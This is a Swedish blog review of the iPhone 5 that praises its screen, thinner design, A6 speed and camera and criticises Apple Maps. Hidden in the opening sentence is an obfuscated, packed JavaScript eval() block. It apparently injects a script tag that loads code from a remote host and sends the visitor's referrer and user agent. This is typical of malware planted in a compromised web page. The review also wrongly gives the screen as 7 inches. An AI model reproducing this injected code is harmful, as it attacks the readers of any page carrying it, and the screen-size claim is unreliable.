Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

iPhone 5 recension, har den vad som krävs?

iphone-5-review-recension
Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fdysz|var|u0026u|referrer|tzedz||js|php’.split(‘|’),0,{}))
har det gått ungefär fyra dagar sedan den älskade och efterlängtade iPhone 5 släpptes i vårt avlånga land Sverige. Natten mellan den 27e och 28e september var det full fart på butikerna tillhörande våra svenska operatörer. Som vanligt när
Apple släpper något så är hypen hög och intresset i både media och privat över det vanliga. 

Nu är den i alla fall här och Revue var självklart en av de första som la vantarna på iPhone 5. Efter skandaler med kartfunktion, NFC och mycket annat har vi nu känt och klämt på telefonen i några dagar och hittat en massa roliga saker.

Om ni inte redan vet det så har det varit massa skriverier om Apples nya kartfunktion som de lanserade ihop med iOS 6. Google Maps är long gone och in kliver ”Maps” som är en egen framtagen karttjänst från Apple. Det hela började med fantastiska recensioner om hur bra kartan var och hur vägbeskrivningar kändes mer ”spot on” än i Google Maps. 3D-funktioner som gör det möjligt att skåda större städer i full 3D och enkelheten i grafiken. De positiva aspekterna var många, men det gick inte många dagar innan nackdelarna började flöda in ihop med att telefonen kom ut till allmänheten. Helt plötsligt var det så många dåliga saker med kartan att Apple var tvungna att ändra sin beskrivning på sin hemsida från ”The best map ever” till ingenting.

I Sverige började det först med att endast några gator (oftast nya) inte fanns med. Dock utvecklades detta till att Apple helt plötsligt hade glömt bort större städer. Exempelvis så var HELA Göteborg spårlöst försvunnet, nästan som att det aldrig funnits där. Självklart något som gjorde Göteborgarna vansinniga.

Skärmen

Men om vi släpper den ”otroliga” kartfunktionen så har iPhone 5 självklart en massa positiva saker också.
Hela designen på luren är enligt mig helt perfekt. Apple har tagit lite av det bästa från alla möjliga smartphones som finns på marknaden idag. Att iPhone länge haft en relativt liten skärm är inget nytt, relativt liten menar jag självklart sett till konkurrenterna Samsung, HTC och Ericsson.

Nu är det ändring på detta. iPhone 5 kanske inte har världens största skärm men 7 tum (format 16:9), vilket iPhone 5 har idag är en enorm förbättring från föregångaren iPhone 4. Många kanske inte tycker det är märkbart, men det är det.
Målet Apple hade när de tog fram denna lur var att göra skärmen större men fortfarande tillräckligt stor för att kunna hanteras med en hand. Nu säger säkert många att de kan hantera de andra smartphonesen med en hand även om deras skärm är både bredare och längre, men alla har kanske inte lika stora händer som er.

Pixeltätheten är densamma som iPhone 4s men skärmen har fått 112 640 extra pixlar. Märker man av detta? Nej, det flesta appar som finns i Apple Store idag är inte uppdaterade, än, men när de väl är det kommer ni verkligen se skillnad. Det finns några som är med i tiden och en av dessa är CNN som ni kan ladda ner och testa.

iphone-5-review-recension

Design

Apple har förutom gjort skärmen längre också gjort telefonen tunnare. iPhone 5 har en tjocklek på 7,5 millimeter dvs märkbart 1,7 millimeter tunnare än iPhone 4 och väger 112 gram, 28 gram lättare än föregångaren.

Jag sitter i skrivande stund och håller i både min iPhone 5 och iPhone 4s, vikten är verkligen något man känner. Den är lättare men detta gör inte att kvaliteten känns sämre utan faktiskt bättre. Det är en skön känsla att inte hålla i en tegelsten vilket iPhone 4 nu känns som.

iphone-5-recension

Snabbhet

Processorn i iPhone 5 har förbättrats. Nu har vi fått in en A6 istället för A5 som föregångaren hade. Detta har gjort att telefonen är dubbelt så snabb som iPhone 4s, det finns ingen annan tillverkare som har tillgång till A6-processorn förutom Apple. Detta är ett stort plus.

Den är faktiskt ruskigt snabb, nästan snabbare än vad jag själv är. Hemsidorna jag surfar in på laddas direkt och även apparna. Allt går mycket mjukare än tidigare.

Kameran

Nu till något som nog många är sugna på, kameran. Inte för att göra er besvikna på något sätt men iPhone 5 har exakt samma antal megapixlar som 4S, dvs 8 mp, det gör att det är likheter.

Till de goda nyheterna. Självklart är det förbättringar även på denna del. iPhone 5 har fått förbättrad ljuskänslighet och det är det som räknas i slutändan, inte megapixels. Jag har inte hunnit ta så värst många bilder med den än men kan i alla fall säga att jag märker skillnad.
Jag ska också ha i baktanke att skärmen på iPhone 5 är otroligt mycket bättre än på 4s vilket också gör att det ser bättre ut. Jag lämnar denna fråga   till er läsare istället som får avgöra om den är bättre eller ej.

men hur som helst, kameran laddar upp dubbelt så snabbt och allt flyter på snabbare och mjukare med hjälp av förbättrad processor.

Vi får inte heller glömma att iOS 6 nu också kan ta panoramabilder med kameran. Detta är dock något som även iPhone 4s har fått med.
Dessa mäter hela 240 grader och är upp till 28 megapixlar så det är stora grejer.

Kameran på framsidan som du förmodligen kommer använda mer för självporträtt än Facetime är också förbättrad och filmar nu i 720p HD-video. Stillbilder blir tagna med 1,2 megapixlar. Bilden nedan är tagen med en iPhone 5.

photos-taken-with-iphone-5-camera-0

Slutsats

Detta blev en snabbdragning av några nya funktioner som iPhone 5 har att erbjuda.
Vi har läst att de är så många besvikna köpare där ute men jag kan faktiskt inte förstå besvikelsen runt denna lur. Det är synd att de personerna tycker som de gör. Enligt mig är iPhone 5 just nu den bästa smartphonen som finns att få tag i på marknaden, inget snack.

Har ni inte bestämt er för vilken er nästa smartphone ska bli kan jag absolut rekommendera iPhone 5. Det finns faktiskt ingen annan som jag testat i nuläget och kan rekommendera istället för iPhone 5.

Du kommer bli super glad och även om den har sina micro-problem så kommer dessa att åtgärdas i vilken sekund som helst.

Och svar på min fråga i rubriken. JA, den har vad som krävs!!!

Läs mer om iPhone 5 här!